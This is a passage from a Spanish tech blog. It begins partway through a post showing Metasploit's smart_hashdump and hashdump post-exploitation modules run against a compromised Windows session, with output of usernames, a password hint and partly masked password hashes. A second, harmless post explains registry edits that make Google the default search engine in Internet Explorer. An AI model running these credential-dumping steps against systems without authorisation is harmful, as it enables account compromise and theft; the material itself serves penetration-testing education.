    [+]  Asistente de ayuda:1000:b4a4XXX:::
    [+]  SUPPORT_388945a0:1002:aaf418XXX:::
    [+]  Javier:1003:5b98bXXX:::
    [+]  ASPNET:1005:6a695044XXX:::
    [*] Post module execution completed
    
  • hashdump
    msf post(smart_hashdump)> use post/windows/gather/hashdump
    msf post(hashdump)> set SESSION 1
    SESSION => 1
    msf post(hashdump)> exploit
    
    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY 264XXX
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hints...
    
    Javier:"p0wned"
    
    [*] Dumping password hashes...
    
    Administrador:500:5b9XXX:::
    Invitado:501:aadXXX:::
    Asistente de ayuda:1000:b4aXXX:::
    SUPPORT_388945a0:1002:aadXXX:::
    Javier:1003:5b9XXX:::
    ASPNET:1005:6a6XXX:::
    
    [*] Post module execution completed
    
En caso de que al ejecutar el exploit ningún usuario tenga configurado una passwd, la salida que tendremos será tal que así, respectivamente.
  • smart_hashdump
    [*]  Dumping password hints...
    [*]  No users with password hints on this system
    [*] Dumping password hashes...
    
  • hashdump
    [*] Dumping password hints...
    
    No users with password hints on this system
    
    [*] Dumping password hashes...
    
Leer más

Google como buscador predeterminado de IE

No creo que nadie diga lo contrario al afirmar que a fecha de hoy, Google como buscador es de lo mejorcito que hay. Bing está comenzando a dar buenos resultados y tiene determinadas funciones que en algunos casos pueden ser de mucha utilidad, sin embargo, para el día a día, emplear Google como motor de búsqueda es la mejor opción. Por lo tanto si eres de los que emplea Internet Explorer como navegador (todavía no conoces Chrome? o Firefox?) y deseas que sea el motor de búsqueda por defecto, lo puede lograr siguiendo estos sencillos pasos. Abre el editor de registro (regedit) y establece el valor que se indica a las variables indicadas, tal como sigue,
HKEY_CURRENT_USER\
 |
 -Software\
  |
  -Microsoft\
   |
   -Internet Explorer\
    |
    -Main
     |
     - Use Search Asst = "no"
     |
     - Search Page = "http://www.google.com"
     |
     - Search Bar = "http://www.google.com/ie"
Lo mismo en,
HKEY_CURRENT_USER\
 |
 -Software\
  |
  -Microsoft\
   |
   -Internet Explorer\
    |
    -SearchURL
     |
     - "" = "http://www.google.com/keyword/%s"
     |
     - provider = "gogl"
Y por último,
HKEY_LOCAL_MACHINE\
 |
 -SOFTWARE\
  |
  -Microsoft\
   |
   -Internet Explorer\
    |
    -Search
     |
     - SearchAssistant = "http://www.google.com/ie"
Tras todo esto, ya tendremos Google como motor de búsqueda por defecto en IE.
Leer más

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios